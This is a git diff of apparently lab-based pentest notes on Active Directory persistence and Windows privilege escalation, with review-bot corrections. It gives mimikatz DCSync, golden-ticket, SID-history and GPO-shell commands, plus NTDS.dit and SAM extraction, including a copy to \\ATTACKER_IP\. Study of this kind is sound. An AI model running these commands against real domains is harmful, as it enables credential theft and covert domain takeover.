diff --git a/Cryptography/Active Directory/AD Persistance.md b/Cryptography/Active Directory/AD Persistance.md index 7ae4c90..326353f 100644 --- a/Cryptography/Active Directory/AD Persistance.md +++ b/Cryptography/Active Directory/AD Persistance.md @@ -1,9 +1,8 @@ # Active Directory Persistance - ## Using Credentials -* __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest +* __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest * __DC Synchronisation__ is the process of syncing credentials between domain controllers, it can be used to gather credentials * Credentials for multiple local administrators * Service account with delegation permissions @@ -11,22 +10,27 @@ ### Usage -* Use mimikatz +Use mimikatz + ```sh lsadump::dcsync /domain: /user: ``` -* To query the krbtgt user + +To query the krbtgt user + ```sh lsadump::dcsync /domain: /user:krbtgt. ``` -* Query everything + +Query everything + ```sh lsadump::dcsync /domain: /all ``` ## Using Tickets -* __Golden Ticket__ crafted TGT, +* __Golden Ticket__ crafted TGT, * Needs domain name, domain SID and a user ID to impersonate * Needs krbtgt NTLM to sign the ticket * krbtgt hash never rotates automatically, only refreshed manually @@ -40,7 +44,7 @@ lsadump::dcsync /domain: /all * DC is never contacted, no contact to any TGT or KDC * Non existing user can be used with a local admin group's SID -### Usage +### Usage * Craft a golden ticket ```sh 
@@ -95,22 +99,24 @@ Get-ADUser -properties sidhistory,memberof ```sh Get-ADGroup "Domain Admins" ``` -* Use [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) to patch `ntds.dit` + +Use [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) to patch `ntds.dit` + ```sh Stop-Service -Name ntds -force -Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit +Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit Start-Service -Name ntds ``` * Verify users SIDs ```sh -Get-ADUser -Properties sidhistory +Get-ADUser -Properties sidhistory dir \\\C$\ ``` ## Using Group Memberships * Most are monitored security wise -* Interesting group for persistence are +* Interesting group for persistence are * `IT Support` * Local administrational accounts * Groups with ownership over GPO @@ -126,7 +132,7 @@ New-ADGroup -Path "OU=IT,OU=People,DC=,DC=,DC=COM" -Name " Steam Network 2" -SamAccountName "_steam_network2" -DisplayName " Steam Network 2" -GroupScope Global -GroupCategory Security +New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name " Steam Network 2" -SamAccountName "_steam_network2" -DisplayName " Steam Network 2" -GroupScope Global -GroupCategory Security Add-ADGroupMember -Identity "_steam_network2" -Members "_steam_network1" ``` @@ -154,7 +160,7 @@ Get-ADGroupMember -Identity "Domain Admins" * AD group templates like `AdminSDHolder` can be used to copy its ACL through the AD's protected groups * Domain Admins - * Administrators + * Administrators * Enterprise/Schema Administrator * SDProp as a process maps the ACLs to protected groups every hour 
@@ -190,7 +196,7 @@ copy \\\sysvol\\scripts\shell.exe C:\windows\tmp\_shell.exe & * Select the previously created batch script and PE * Catch the shell when an admin logs on -* Once again open mmc +* Once again open mmc * Right click Enterprise Domain Controllers -> Edit settings, delete, modify security * Click on every other group except Authenticated Users and remove them diff --git a/Post Exploitation/Windows/Windows PrivEsc.md b/Post Exploitation/Windows/Windows PrivEsc.md index 32fcdee..fd7b233 100644 --- a/Post Exploitation/Windows/Windows PrivEsc.md +++ b/Post Exploitation/Windows/Windows PrivEsc.md @@ -337,6 +337,17 @@ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\ ``` +#### In case you are on a DC + +You can extract the AD database which stores every domain account and its password hash via Volume Shadow Copy Service. `NTDS.dit` is stored at `C:\Windows\NTDS\ntdis.dit`. + +```sh +vssadmin create shadow /for=C: +copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\TEMP\ntds.dit +copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\TEMP\system +vssadmin delete shadows /shadow={$SHADOW_ID} /quiet +``` + ### Dump LSASS LSASS contains multiple different credential types like NTLM password hashes,
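Review bot: the KCC bullet in `AD Persistance.md @@ -1,9 +1,8` is touched only for trailing whitespace but keeps an inaccurate claim. The Knowledge Consistency Checker builds the replication topology (the connection objects between DCs); it does not itself replicate credentials, the directory replication that runs over that topology does. Since the line is being rewritten anyway, suggest `* __Knowledge Consistency Checker (KCC)__ builds the replication topology between DCs; replication over that topology carries the credentials`. Same hunk: the heading typo `Persistance` should be `Persistence` (the file name has the same typo), and the `DC Synchronisation` bullet is a run-on; end the sentence after `domain controllers` and start a new one with `It can be used to gather credentials`.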
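Review bot: the krbtgt example in `@@ -11,22 +10,27` still carries a stray trailing period, `lsadump::dcsync /domain: /user:krbtgt.`, which is passed to mimikatz as part of the account name; since the surrounding bullets are being reflowed into paragraphs, drop the period in the same hunk. Two smaller points in the Golden Ticket list this hunk reaches: `Needs krbtgt NTLM to sign the ticket` should read `NTLM hash`, and the line `krbtgt hash never rotates automatically, only refreshed manually` deserves the defender-side caveat that a single manual reset is not enough, because the KDC still accepts tickets signed with the previous krbtgt key until it has been reset twice.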
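Review bot: `@@ -40,7 +44,7` only strips whitespace from `### Usage`, but the context line `DC is never contacted, no contact to any TGT or KDC` is muddled: a TGT is the ticket being forged, not something that is contacted. Suggest `DC is never contacted: the KDC is not involved in issuing the forged TGT`, which is the point the Golden Ticket section is making.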
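Review bot: the changed `Add-ADDBSidHistory` line in `@@ -95,22 +99,24` keeps the typo `low-priveleged` (should be `low-privileged`); fix it while the line is being edited. The verification step in the same hunk, `Get-ADUser -Properties sidhistory`, will not list anything as written, because `Get-ADUser` requires `-Identity` or `-Filter`; suggest `Get-ADUser -Filter * -Properties sidhistory | Where-Object { $_.SIDHistory }` to show every account that now carries injected SID history (the hunk header context `Get-ADUser -properties sidhistory,memberof` has the same problem). It would also help to say why `Stop-Service -Name ntds -force` is needed: the ESE database is locked while the directory service runs, and stopping it takes the DC out of service for the duration of the edit.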
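Review bot: `@@ -126,7 +132,7` replaces the `DC=,DC=,DC=COM` placeholders with the lab-specific DN `OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC`, which is inconsistent with the rest of the notes, where DNs and hostnames are left as placeholders; either keep the placeholder form or mark this as the lab example. Unchanged in both versions, `-Name " Steam Network 2"` and `-DisplayName " Steam Network 2"` start with a leading space. If that is deliberate (a lookalike that sorts next to the legitimate group), a short comment saying so would stop a reader from "fixing" it; if not, strip it.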
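Review bot: `@@ -154,7 +160,7` trims whitespace from `Administrators`, but the context line above it describes `AdminSDHolder` as an AD group template, which it is not: it is a container object under the System container whose security descriptor SDProp stamps onto the protected groups and their members. Suggest `* The ACL of the `AdminSDHolder` container is copied by SDProp onto the protected groups and their members`, which also makes the following `SDProp ... every hour` bullet read correctly (the default interval is 60 minutes).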
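Review bot: the new `In case you are on a DC` section in `Windows PrivEsc.md @@ -337,6 +337,17` states the database path as `C:\Windows\NTDS\ntdis.dit`, while the copy command two lines later correctly uses `ntds.dit`; fix the prose to match. The commands also assume the new snapshot is `HarddiskVolumeShadowCopy1`, which is only true if no shadow copy existed before; `vssadmin create shadow` prints the `Shadow Copy Volume Name` and the `Shadow Copy ID`, and both the copy lines and `vssadmin delete shadows /shadow={$SHADOW_ID}` should be taken from that output. Two practical notes worth a sentence: `copy ... C:\TEMP\ntds.dit` fails if `C:\TEMP` does not exist, and `vssadmin create shadow` is available on Server editions (fine on a DC, but not on a client build), so the section should say why it belongs under this heading only.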